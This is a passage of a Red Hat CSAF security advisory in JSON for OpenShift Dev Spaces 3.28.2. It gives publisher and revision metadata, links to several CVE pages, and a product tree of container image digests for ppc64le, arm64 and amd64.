"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:25123",
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.28/html/administration_guide/installing-devspaces",
"url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.28/html/administration_guide/installing-devspaces"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42578",
"url": "https://access.redhat.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42579",
"url": "https://access.redhat.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42581",
"url": "https://access.redhat.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42584",
"url": "https://access.redhat.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42587",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-43512",
"url": "https://access.redhat.com/security/cve/CVE-2026-43512"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-6321",
"url": "https://access.redhat.com/security/cve/CVE-2026-6321"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_25123.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.28.2 Release.",
"tracking": {
"current_release_date": "2026-07-03T12:02:55+00:00",
"generator": {
"date": "2026-07-03T12:02:55+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:25123",
"initial_release_date": "2026-06-10T19:42:14+00:00",
"revision_history": [
{
"date": "2026-06-10T19:42:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-10T19:42:24+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-03T12:02:55+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces 3.28",
"product": {
"name": "Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3.28::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=1780679565"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3A0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/code-sshd-rhel9\u0026tag=1780678593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3A7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=1780548550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Aca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=1780685176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3Af1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=1780573614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/jetbrains-ide-rhel9\u0026tag=1780608672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3A1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/multicluster-redirector-rhel9\u0026tag=1780695724"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Aaf397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/openvsx-rhel9\u0026tag=1780948325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=1780592394"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Afbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=1780696380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3Ae2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=1780694994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=1780593759"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=1780929707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel10\u0026tag=1780600267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=1780601703"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=1780679565"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3A324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/code-sshd-rhel9\u0026tag=1780678593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Ab52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=1780548550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Adee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=1780685176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=1780573614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/jetbrains-ide-rhel9\u0026tag=1780608672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3A060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/multicluster-redirector-rhel9\u0026tag=1780695724"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/openvsx-rhel9\u0026tag=1780948325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=1780592394"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3A06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=1780696380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=1780694994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=1780593759"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=1780929707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Acb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel10\u0026tag=1780600267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2?arch=arm64\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=1780601703"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Ab1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/code-sshd-rhel9\u0026tag=1780678593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3Abb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=1780679565"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"product_identification_helper": {
